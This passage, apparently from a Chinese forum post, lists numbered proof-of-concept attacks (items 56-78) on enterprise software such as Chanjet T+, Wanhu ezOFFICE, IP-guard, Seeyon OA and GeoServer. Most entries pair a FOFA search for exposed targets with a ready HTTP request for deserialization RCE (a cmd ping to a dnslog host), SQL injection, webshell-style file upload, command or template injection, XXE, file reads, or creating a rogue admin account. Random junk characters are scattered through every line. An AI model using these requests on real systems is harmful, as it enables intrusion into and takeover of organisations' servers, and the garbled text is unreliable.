/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers) f9 D* }% L4 R, B8 ]# z
: o+ ~9 T4 _$ F" P  F
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
( Q! \$ o8 P+ b4 [! \) c7 eFOFA: app="畅捷通-TPlus"6 H* ?7 x, D3 N7 I! `! X
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
" V; Z2 `7 Q* C% @Host: x.x.x.x8 V" j2 @! t7 i* p) Y% H$ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  ~: k% N3 I% K2 ^) q) ~
Content-Type: application/json9 A; S8 L& `8 @( ]* x5 H

% O  w3 t2 w% N" Y# |7 E: [6 e{3 A5 d& L: S5 S% r; [5 @$ [; _
  "storeID":{
4 J& H; ~6 ?6 X    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",& o" O- x% E( J. E( n, u6 X* X
   "MethodName":"Start",
: n0 s( T: \- M( Y    "ObjectInstance":{
! Q- U5 K4 o0 b  w! G+ K+ F       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 F( f% h: x. l. u
        "StartInfo": {* c, w0 ^+ B/ x* p3 t; H  F
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! H4 N- L3 q8 K, F2 X           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
) r- ?+ T  A  @4 Q8 T       }/ U0 c! i( {: ^  d0 H  J8 v
    }! X- ~/ d  V6 B" j
  }. Y5 d2 s: U) l5 N$ M" n
}: u% Y0 i" Y# w! J$ T- Y8 R

' S) m1 x) M1 M6 `3 _8 U$ {# B1 q' k  x. M  }- i# P5 ?. Q
57. 畅捷通T+ keyEdit.aspx SQL注入8 a) j' n7 \- T7 b1 M6 g0 p
FOFA:app="畅捷通-TPlus"
3 D0 W  \6 }9 MGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
  {" h! e' D0 o) C2 j) U# AHost: host
5 ~  j$ f( E8 k4 PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ T" {+ O0 U+ B* Z- j* M
Accept-Charset: utf-83 ]2 I7 e" K: T! N3 f7 `$ k  o
Accept-Encoding: gzip, deflate
, |' c# j; e& [. K% ~Connection: close; @. c. _! N$ I5 t& s
6 F3 Q4 d5 m- S" }- g# u0 s

8 o1 ^! f. u, G, E: M) J; W58. 畅捷通T+ KeyInfoList.aspx sql注入
: A  M, y2 }  ?) p% S( ?9 R0 [! tFOFA:app="畅捷通-TPlus"
/ i$ t8 _' l# s% F0 Y$ lGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
  K+ g% P/ Z+ W2 {' S( o: HHost: your-ip
) a  E& I8 v0 qUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 u& y2 K. b/ w, S6 A# P
Accept-Charset: utf-8; [6 U/ e# |+ S! T
Accept-Encoding: gzip, deflate
' r, z' V' P1 Z7 H) fConnection: close8 `6 O' `9 D9 W
7 G0 j$ ^& t" I8 q) H+ u" a" z: w
" y& T% j" C, Y5 z( ]
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
4 H4 I% L- @$ [: p# T$ D& OFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
1 h+ A; f$ w+ v/ s6 d$ l5 ]POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1  D! [6 T4 o3 e# }' _
Host: 192.168.86.128:9090
) w; l* E6 {5 r) T+ K: i  Y2 LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.365 N* N$ ?2 O9 b. R, M  K1 r
Connection: close% {3 d5 P. o; J, |8 r3 w
Content-Length: 1669
  G. J! |+ g) lAccept: */*! x. C$ O& Z& `. M* T$ t' M
Accept-Language: en. C1 u1 W" _# E, M! B' s2 b' J) ~
Content-Type: application/x-www-form-urlencoded4 L: V; y* x- o, z
Accept-Encoding: gzip
  o& ^# d1 ]  ^4 k7 }; s
6 {6 z' Z/ h( M1 o9 cPAYLOAD
4 G7 ^5 J. y& J; ~( p0 }/ S$ v/ E! y& O0 J2 ~/ t1 y3 e

7 L) o6 e/ n# N60. 百卓Smart管理平台 importexport.php SQL注入1 X. R- [' y. b9 T! W
FOFA:title="Smart管理平台"
3 @' J) J& v, x& V' C9 xGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.10 h8 l6 r" k- ^% T; P3 p
Host:
8 \; k* c2 z' i  SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: b8 Z( ?% Z2 F" l  K  Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 V; m2 j  r! m: @3 v8 l) d( B8 F. iAccept-Encoding: gzip, deflate. D& P7 s3 r, A# _  ^7 w
Accept-Language: zh-CN,zh;q=0.9
' v( ?* ?$ Q! b1 g3 P: T8 `! AConnection: close
* T- q: s; i% @: h/ s; e. v8 Q
" G+ @8 o, N* r4 T/ G7 G+ s9 {$ d1 k
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传3 Q+ T) @" a" c" W
FOFA: title="欢迎使用浙大恩特客户资源管理系统"! P" p. z0 F% s* r$ z
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1% v' E, i; i. X6 x. Q( n. ]* F1 a
Host: x.x.x.x
# I, P  H7 I$ R* ^, uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- w! O$ w. N: z7 n2 h
Connection: close
& {1 ^' e5 B, h( e& yContent-Length: 27
9 y  d" c; q& O3 ]0 p; o! _Accept: */*( W. D5 `5 j& K! U; V0 u: [$ t
Accept-Encoding: gzip, deflate( P' G5 _% @, \5 c; o% P2 U1 W
Accept-Language: en
) V4 {- \5 y. a9 n) oContent-Type: application/x-www-form-urlencoded/ ^/ f/ ]+ ~* G  p
7 a# J3 o% U. T! y1 u
8uxssX66eqrqtKObcVa0kid98xa
& u2 P( y# S" D& O( |) Y$ }- N& t, U" Y' ~* J8 K

; V/ M' k8 |2 I# M62. IP-guard WebServer 远程命令执行! S* ]/ k0 S' I# j6 R
FOFA:"IP-guard" && icon_hash="2030860561"
/ {1 F- V; _- fGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.15 |' L2 r5 @3 A
Host: x.x.x.x/ W# z( V- |' F6 P
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
6 t! B7 @$ y. s* H' kConnection: close
2 F3 B* Y$ y1 C( [& V! [Accept: */*
% T; U- x1 B& TAccept-Language: en
1 Q' \* N: X2 ?6 E5 v4 M: J5 {, [Accept-Encoding: gzip0 t: G! _( I# Q# ^% W

1 o% H5 Z) R4 a( ]1 o* w' X2 O
, Y0 x! T, z2 _: {9 x( l8 r, x, m# o访问& E) h7 P. F5 K+ _/ _' H& q# u2 D9 {

1 j  _3 m. i' g' w  g) Z# K- Q7 `, VGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.17 C, N. P+ C$ s8 W
Host: x.x.x.x
6 }' ^1 X7 U$ }+ x& \" o1 q! g4 ^9 F; y% Y+ T( f8 I- R
7 @+ B" B, A+ d, l% X8 ~: d8 d. h
63. IP-guard WebServer任意文件读取$ g" i3 a( k" w, C8 X
IP-guard < 4.82.0609.0
2 _- v1 _# q- [" `/ R! W: d7 b7 rFOFA:icon_hash="2030860561"
0 y( h3 ]6 G% J2 S' j. E" j, O  i. WPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
9 w6 [8 e7 q5 L$ }* h  z' W5 Q4 S, _Host: your-ip/ `. z/ v- h" o9 O1 U( M+ z' o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  }2 M6 i$ U8 o' h! s9 r/ C7 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( r& g  R' L* c& FAccept-Encoding: gzip, deflate
$ [6 |/ K, ]4 R$ I- [( ]& @Accept-Language: zh-CN,zh;q=0.9
1 _3 _# t( |7 Q3 A1 g9 e4 TConnection: close
& p4 g% x4 f& a$ G7 p; L- k7 r9 x* DContent-Type: application/x-www-form-urlencoded6 R" {, ~, W1 M1 J: t. R

! ^0 f: J. s* b7 D  Hpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
# ]% q' A7 K5 A9 r$ ?
7 w/ r9 d2 L8 _/ S. u64. 捷诚管理信息系统CWSFinanceCommon SQL注入% I( Z/ r! M% P& n* B  i3 z8 r
FOFA:body="/Scripts/EnjoyMsg.js"
7 G& n# z" k$ q' PPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
3 j* |/ i) |- t3 J0 f5 THost: 192.168.86.128:9001
  E1 Z) O6 o) B9 B. tUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.369 o, J% }% t) Z7 b! q  G
Connection: close" u2 t* d3 U; M& t) C7 l, k$ f
Content-Length: 369) D* j) W- I  p8 v$ ]
Accept: */*- g+ M4 ^  L9 ?7 b. N- k
Accept-Language: en( Y; `8 E2 {6 i6 U* C
Content-Type: text/xml; charset=utf-8
7 `* Y  c) p. C+ ?0 |) L- H: s8 p: iAccept-Encoding: gzip* [. n) e! a, r, f
* U8 l8 n0 ?6 S
<?xml version="1.0" encoding="utf-8"?>
) `" Z& T# }5 q- [& ?<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 v+ c. s4 Z% N0 j& Q$ y% \<soap:Body>
1 J; K" v0 ~6 k' [: X    <GetOSpById xmlns="http://tempuri.org/">/ t/ U3 l' l. z0 O, D0 a$ E
      <sId>1';waitfor delay '0:0:5'--+</sId>
+ m: M9 f' n2 }1 \; }% y& M( a* ~    </GetOSpById>  w  ?$ |( {8 {  m3 }
  </soap:Body>+ U$ R7 y* l' ~, J& X( a
</soap:Envelope>
- D  a: R  a! v( t0 {+ Q% X, p- h7 }& P5 E/ W) \4 e% _3 s9 {  B( R
5 o% ]* `. @3 V6 p0 J7 e% i5 O
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" ~5 @7 M6 ?! L, M+ ]+ f
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"$ m) `1 g# T. x/ \
响应200即成功创建账号test123456/123456
. Q. p: q7 }1 M. X/ n2 OPOST /SystemMng.ashx HTTP/1.18 n1 g8 E. w4 v1 h
Host:5 D' i# j7 u3 ^, }- J0 J" l
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
# F7 u% S6 h% f, cAccept-Encoding: gzip, deflate
6 X- N; t0 ~8 H$ g$ kAccept: */*
- b  ^8 h/ ]( i1 @8 v+ HConnection: close) |$ v' a5 f) m" ^  S. a
Accept-Language: en
+ G  U% [2 X% j; d7 z7 |5 ?7 ]Content-Length: 174
6 c% H& ^2 I- d+ D8 A' \
2 @- e, D* `0 U/ ~9 r4 }operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
5 j0 A: |6 ~" U: z& ]2 j- v5 \' M# g! I0 Z9 U7 k2 I
8 U) h# ]2 t# z) D5 e6 e5 Z
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
. S' z+ u7 B+ o) pFOFA:app="万户ezOFFICE协同管理平台"2 b! F8 H, L7 b9 r
& X5 M5 x0 r: |' |
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
; a9 h5 o/ S. g' y) l1 n/ `7 L1 ZHost: x.x.x.x. N9 E% }, r, x( R* ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
2 M& k7 G( u6 c% G- `, bConnection: close
. P# f6 g% P& D$ ?Accept: */** S$ D4 [$ f5 Z
Accept-Language: en
3 o6 }+ h8 b9 m, W: t# `' ~8 K) OAccept-Encoding: gzip
. h: _7 c7 @( D) f/ M& M; G
* U5 k1 q, a4 W1 b
  }. j% Q0 s+ C4 G+ h第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
  @- d, J8 ]# }3 N" M, Q3 I
, S& z( J, D  A4 q67. 万户ezOFFICE wpsservlet任意文件上传
) Y. f! B) _) D: L" aFOFA:app="万户网络-ezOFFICE"
! J% w0 N7 g+ _' bnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
7 e& M' ~* b* z& j, DPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
* o/ S2 k* ^9 a# J7 l6 ~0 D9 a6 ~Host: x.x.x.x
3 W, S! Q: w% v' |" ^User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.03 s5 ]$ k- i1 Y7 T( N. A- w+ s
Content-Length: 173& A; O  z* h, P/ z% I5 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8& B+ X9 \9 {' D+ E
Accept-Encoding: gzip, deflate
( K) y" {* Y. g5 n( {. b- WAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  P$ P0 ]: V" U' G) SConnection: close
. K% F3 K. {) c, f& y" SContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp  d! A0 L, n$ k- s
DNT: 1
7 F8 Q  z5 l; G& f2 V. T3 ?Upgrade-Insecure-Requests: 1) r$ Q9 {0 M: R, R  C
; O8 g5 c2 A. U  d: ]5 d
--ufuadpxathqvxfqnuyuqaozvseiueerp
1 A( }" c! G) o9 BContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"9 n: A/ L, I5 Z

: o3 Z( t" L& q; A% K: V# j6 C<% out.print("sasdfghjkj");%>1 E( |( f+ X! L- r+ v' a; O
--ufuadpxathqvxfqnuyuqaozvseiueerp--! ~  e* q  z# v  u% r$ F4 D5 F2 L! s

( g6 z! i; j$ `* d" S  J" ~+ p" Y3 I+ E& S( t. M* H
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp1 \( G: C+ U& t# T- G! p

( W0 H4 @/ D9 ^( A; D' P+ n+ `; v68. 万户ezOFFICE wf_printnum.jsp SQL注入
: G; c2 u$ }: |FOFA:app="万户ezOFFICE协同管理平台"
0 L/ O- W* S$ l9 [7 D  ?GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
: ?$ j- e' C) p; v& p2 lHost: {{host}}1 g" K. d7 d8 o" S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.368 G  X; p; _+ M" c7 v
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ [* d8 ]1 [) R" fAccept-Encoding: gzip, deflate7 u& g, ~5 k1 C0 a. T
Accept-Language: zh-CN,zh;q=0.9
1 L2 q: M4 g5 j- o$ JConnection: close
3 p: _% M6 x4 m' o2 f/ C
, f4 q" @0 s7 u3 {0 l. }, E* f3 Y$ k- ?1 V3 \% s/ y
69. 万户 ezOFFICE contract_gd.jsp SQL注入
8 p/ G) I# K4 x! c3 \; D( j$ cFOFA:app="万户ezOFFICE协同管理平台"
' P, G2 Y+ y% @" D4 X- E# NGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
0 ~% X% t; a3 U8 R  R% Q& DHost: your-ip8 r$ e+ L% A$ }) U% b- q/ a% s3 ^
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36  L4 E3 Z# n) Q" t. v" _
Accept-Encoding: gzip, deflate
- t  ?$ ?" g* F, g4 ~: R# o4 lAccept: */*
7 S! p  V1 H0 r4 j/ X3 h/ P6 d# ^Connection: keep-alive5 o* E% t0 q/ G! e' Q/ g
7 L+ B( Y' I" T& g3 B! `
2 i: Q1 Z0 U" m: q
70. 万户ezEIP success 命令执行4 |7 A  P) }, j9 z$ S
FOFA:app="万户网络-ezEIP": x4 x' j6 J9 Y+ j0 t+ C* u$ b
POST /member/success.aspx HTTP/1.1; X( ~+ }8 i: Q
Host: {{Hostname}}9 e& e2 K  n# H. a& `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: Y2 b$ h4 T7 f* m7 r& w9 w
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
$ R. Z  g6 O% t; p0 u3 ?/ u* qContent-Type: application/x-www-form-urlencoded
) G. J6 K" v  P% ^TYPE: C* Y; r/ z' R5 c; A8 m# n+ F
Content-Length: 167024 J" |: O% [* h# v* e$ [# _
6 ?- g% h: Y) @% P6 F
__VIEWSTATE=PAYLOAD1 y, X, [( f$ j, M

  Q, E. Q( D2 X5 v( C) v4 \7 ^  R6 S2 Q" k, [
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入- o0 @4 }/ y* W1 m# {" U7 T) q
FOFA:body="PM2项目管理系统BS版增强工具.zip"7 ?$ F% w2 ~: e# ~% m' W7 i- z
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
- A' i$ G2 D' A) sHost: x.x.x.xx.x.x.x
" @4 n8 ~. Q; }0 U# ~8 y3 R6 R. XUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
/ i/ a, G* b5 L) o  r5 ]# |# |/ GConnection: close; A0 b/ |% P7 j- m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 d/ d$ w: @" e. X9 F/ X
Accept-Encoding: gzip, deflate* y) y6 Q/ s. b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: x) Y2 q) c$ ^Upgrade-Insecure-Requests: 1( J$ U- i5 h# z; G2 }. p

( o$ U/ }. w6 u$ H- k- W7 Z0 F7 a$ G7 H8 }% B; `9 c7 ^
72. 致远OA getAjaxDataServlet XXE
# @  U- k) ~- \( Y5 j, c9 C- \& yFOFA:app="致远互联-OA"" O! X8 L: ]. x! c5 E' a2 @
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1* f3 ]4 z$ b0 \) J; ^) }
Host: 192.168.40.131:8099
) F0 G& ^+ B& g) ^User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36; ^1 X9 R. h% |* i
Connection: close
$ J* w8 F  Q" c5 }0 kContent-Length: 5835 P  {9 a. V" n
Content-Type: application/x-www-form-urlencoded
/ G* s5 I( ^) f2 }Accept-Encoding: gzip
# T/ [7 b) K# P" J' M; n7 E5 e; k  v7 }5 x; B" P% h: |& L  E
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E& G- I+ M5 @& j2 n8 @
3 U+ ]! D7 i. x# C2 T% l

1 j$ ^1 V% e; I3 l73. GeoServer wms远程代码执行" k: ]% O' Y2 _+ L2 u( k
FOFA:icon_hash=”97540678”
1 x% j: r  G4 S& {7 k2 `) k2 I( F, hPOST /geoserver/wms HTTP/1.1( d5 D1 d! O* e% q
Host:
. e) b, a' ?% LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36% t7 s6 F8 x/ @- O2 V' q1 g9 U( p9 }; n
Content-Length: 1981
! B' u  U" E+ M1 m" sAccept-Encoding: gzip, deflate6 w7 T; |' j6 U& g
Connection: close) x4 k3 O+ i7 f" p# D* F
Content-Type: application/xml0 s2 v6 I: z: U& B+ f+ |2 e3 S& }
SL-CE-SUID: 30 g: a( R# [; h  U. S# `: ~# V
5 R) {" y" C, Z2 R" J; b
PAYLOAD
3 k5 I+ l& y1 N4 e5 ~+ T# k9 N" \& ~
$ t2 g/ S( s) C! [/ @- r" N* H( E$ o( b9 E* a
74. 致远M3-server 6_1sp1 反序列化RCE
7 w7 p. U5 k- ^( M" ~FOFA:title="M3-Server"
5 r- b8 T/ @9 G8 x  O9 E0 nPAYLOAD
: i2 t0 |& H9 t' {/ Y' u
: W, m) ^' c+ v) J2 K5 C2 N75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE3 ]3 V+ @- f5 T0 d: K; P) x$ P  c
FOFA:app="TELESQUARE-TLR-2005KSH"6 J$ |; b! n- T) }7 j5 D
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
' x2 M' Y- b; i0 D" m3 ]( \/ RHost: x.x.x.x! M$ Y, i) \/ U) Y% d! s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 P2 U. t- }/ j; t7 C7 [! RConnection: close
8 `6 Q: f$ f$ p$ sAccept: */*- F9 n/ T% m& u+ F$ J. S
Accept-Language: en
* h6 B  ~6 A2 i, WAccept-Encoding: gzip
6 {8 o& O0 l. n; y4 ~: @( l! i: z
; O$ i$ U; a. g  ~
5 v8 a! A6 j: q# fGET /cgi-bin/test28256.txt HTTP/1.1
2 Q* \4 ?- s/ XHost: x.x.x.x! F) m, z- W" y8 z
0 h% c8 T% M5 K! N: q

) S$ Y) i8 s5 F, @76. 新开普掌上校园服务管理平台service.action远程命令执行6 P" A+ l3 y# @4 M/ Y6 O" g
FOFA:title="掌上校园服务管理平台": k0 e3 ?7 v% y1 |( J5 X
POST /service_transport/service.action HTTP/1.1# x. Y4 Q! U, l2 s( F: D% c9 \
Host: x.x.x.x6 m/ R7 H  b  q5 C+ {' a! T: y+ w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.06 r- S/ H2 P% c+ e$ m% M( P
Connection: close
% J/ R* L: d/ g; D* fContent-Length: 211
3 m3 i% _$ E# J0 z- C. g9 m9 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 ~  H$ _% R6 t( b7 \3 W( fAccept-Encoding: gzip, deflate
; A- y2 O6 r; s. J8 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  g( K. R" h' fCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
0 I$ s' t6 g& M6 M6 e" R) |Upgrade-Insecure-Requests: 1/ d# S) A4 P9 d0 Q8 v
  ], M4 V5 G4 p2 z1 m% ^
{
0 [" ]4 R# s6 I"command": "GetFZinfo",
% T) G" q, A) p  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\", n, I3 A. X& R1 d9 E5 ?, R
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"3 k* E1 m- l- g4 e
}
) w" {! {4 |! `' f! v/ y! S0 z
/ t9 T4 c2 m% t: p
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
5 R# G( q: }( Z9 E4 \0 h  h& RHost: x.x.x.x- y. M" v& ~4 I4 j1 L9 H+ \% _$ I

2 |/ B; P! a: o# [# w' V: ~6 u
# ^) k0 Q* I1 Z% P
# z1 {- u) ~5 b; ^! P- [77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! |0 `( R$ }1 Y) ~1 U" S+ aFOFA:body="F22WEB登陆"# G8 i, a: P- p# K
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
8 c% M& d. U2 y6 Q4 _! T9 w% xHost: x.x.x.x
; X+ P  M9 U) e0 l, C# Z" U- `8 ~1 J, uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 R7 Z9 Z; B' g! bConnection: close
' s& q; Y& H0 G+ x5 H/ ZContent-Length: 433+ M" U: I. ^% v5 O* q; U& |( v, f6 X0 j
Accept: */*
+ D6 h1 o7 h0 M& r/ C( F: @Accept-Encoding: gzip, deflate- L/ S: |) U: l7 J
Accept-Language: zh-CN,zh;q=0.92 c' f; G) p6 S* {4 @
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
* {* W; p) Y: d7 T  o
1 ?; z1 o# [9 a2 q  o" m) O  l------------398jnjVTTlDVXHlE7yYnfwBoix5 \1 }2 H, D8 e! C
Content-Disposition: form-data; name="folder"2 l  E6 o$ H  Q( H4 J8 W9 T
; m0 }4 y5 g. C+ W' B; K
/upload/udplog" x6 _, V6 E5 ], x
------------398jnjVTTlDVXHlE7yYnfwBoix$ V6 z% F. e1 W- @) K8 T3 d! Z
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
4 x$ I  Y. ]* G2 {7 t% GContent-Type: application/octet-stream
6 W7 O  L/ |! B5 ?) @" ]  h, s" ~
' [/ n4 z- }  ?hello1234567& ~" M0 v1 S# [
------------398jnjVTTlDVXHlE7yYnfwBoix5 g) M8 U( d; X$ y
Content-Disposition: form-data; name="Upload"* o4 R0 U/ R% b( g; O
* w: u1 D! m! _4 i  ^
Submit Query
$ E# d$ \0 w5 O7 R$ b/ N------------398jnjVTTlDVXHlE7yYnfwBoix--
3 g+ Q6 \0 H" i9 G% b) c+ t
, z# m$ C8 ~3 W% u$ g  [- B9 G% l& x
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传+ t+ Z5 i' m" I) K2 p# p
FOFA:icon_hash="2001627082"
+ C" a" j6 i5 l' }2 y- ~. t" _POST /Platform/System/FileUpload.ashx HTTP/1.1
/ ?# w( C# _3 k  EHost: x.x.x.x
